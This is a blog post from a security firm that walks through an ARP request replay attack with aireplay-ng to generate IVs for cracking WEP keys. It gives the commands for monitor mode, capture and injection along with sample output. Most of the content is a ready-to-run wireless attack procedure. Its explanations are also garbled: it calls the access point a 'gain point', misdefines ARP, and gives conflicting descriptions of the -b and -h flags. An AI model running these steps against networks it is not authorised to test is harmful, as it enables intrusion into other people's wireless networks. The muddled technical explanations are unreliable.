Airzero Sec

We Do Not Give Up ! Trust US !

How Do ARP Request Replay Attacks?

- Posted in Website Security by

enter image description here

The best ARP request replay attack is the most suitable way to make new initialization vectors, and it runs very reliably. The program looks for an ARP packet then retransmits it back to the point that it accesses. This, in turn, causes the access point to continuously loop the ARP packet with the latest IV. The function retransmits the same ARP packet more and more. However, each packet repeated by the access point has the latest IVs. It is all these latest initialization vectors that make you determine the WEP key.

What is ARP?

ARP is address protocol: A TCP/IP protocol used to change an IP address into an external address, such as an Ethernet address. A host wishing to gain an external address broadcasts an ARP request onto the TCP/IP. The admin on the network that has the address in the request then replies with its physical hardware address.

What is the usage of ARP?

The basic usage is :

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where this was used:

  • 3 means classic arp request replay
  • -b 00:13:10:30:24:9C is the gain point MAC address
  • -h 00:11:22:33:44:55 is the source MAC address
  • ath0 is the wireless user interface name

The next usage is:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r
replay_arp-0219-115508.cap ath0

Where is it used:

  • -3 means classic arp request replay
  • -b 00:13:10:30:24:9C is the point of MAC address
  • -h 00:11:22:33:44:55 is the gain point MAC address
  • -r replay_arp-0219-115508.cap is the name of the file from your last perfect ARP replay
  • ath0 is the wireless interface

The next usage is :

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where is it used:

  • 2 means interactive frame
  • -r replay_arp-0219-115508.cap is the name of the folder from your final successful ARP replay

What are the examples of the usage?

For all of the given examples, use airmon-ng to put your card in monitor mode first. You cannot inject packages unless it is in monitor mode.

For this type of attack, you need either the MAC address of a client , or a fake MAC address from the attack. The simplest and fastest way is to use the MAC address of a client. This can be obtained through airodump-ng. The reason for using a MAC address is that the gain point will only require and repeat packets where the sending MAC is “associated”.

You may need to wait for a couple of seconds, or even longer, until an ARP request pops up. This type of attack will fail if there is no traffic.

Enter below command:

aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system will responds:

Saving ARP requests in replay_arp-0219-123051.cap

You should also start airodump-ng to hold the replies.

Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initially the last line will look same as the below command: Read 39 packets , sent 0 packets...

Then when this type of attack is in progress, the zeroes display the actual counts as in the full sample that is given above. You can also make sure of this by running airodump-ng to hold the IVs being created. It should show the data count increasing rapidly for the specific access point.

The second we will look at is reusing the captured ARP from the above example. You will show that it said the ARP requests were being used in “replay_arp-0219-123051.cap”. So rather then waiting for a new ARP, we simply continue to use the old ones with the “-r” parameter:

aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds like the below command:

Size: 86, FromDS: 0, ToDS: 1 (WEP)
BSSID  =  00:14:6C:7E:40:80
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:0F:B5:88:AC:82
0x0000:  0841 0000 0014 6c7e 4080 000f b588 ac82  .A....l~@.......
0x0010:  ffff ffff ffff 7092 e627 0000 7238 937c  ......p..'..r8.|
0x0020:  8011 36c6 2b2c a79b 08f8 0c7e f436 14f7  ..6.+,.....~.6..
0x0030:  8078 a08e 207c 17c6 43e3 fe8f 1a46 4981  .x.. |..C....FI.
0x0040:  947c 1930 742a c85f 2699 dabe 1368 df39  .|.0t*._&....h.9
0x0050:  ca97 0d9e 4731                           ....G1
Use this packet ? y

You say “y” and then your device will create injecting:

Saving chosen packet in replay_src-0219-123117.cap

You should also start airodump-ng to hold the replies.

 Sent 3181 packets...

As well, you can continuously use per the Usage Section above:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

At this time, if you have not already done so, start airodump-ng to hold the IVs being generated. The data count should be increasing continuously.

When you are doing this at home, to create an ARP packet to start with the ARP injection, simply ping a non-existent IP on the network.

If you have any doubts about this topic or have to get advice and get the best services and consultation about ARP request replay attack . Feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/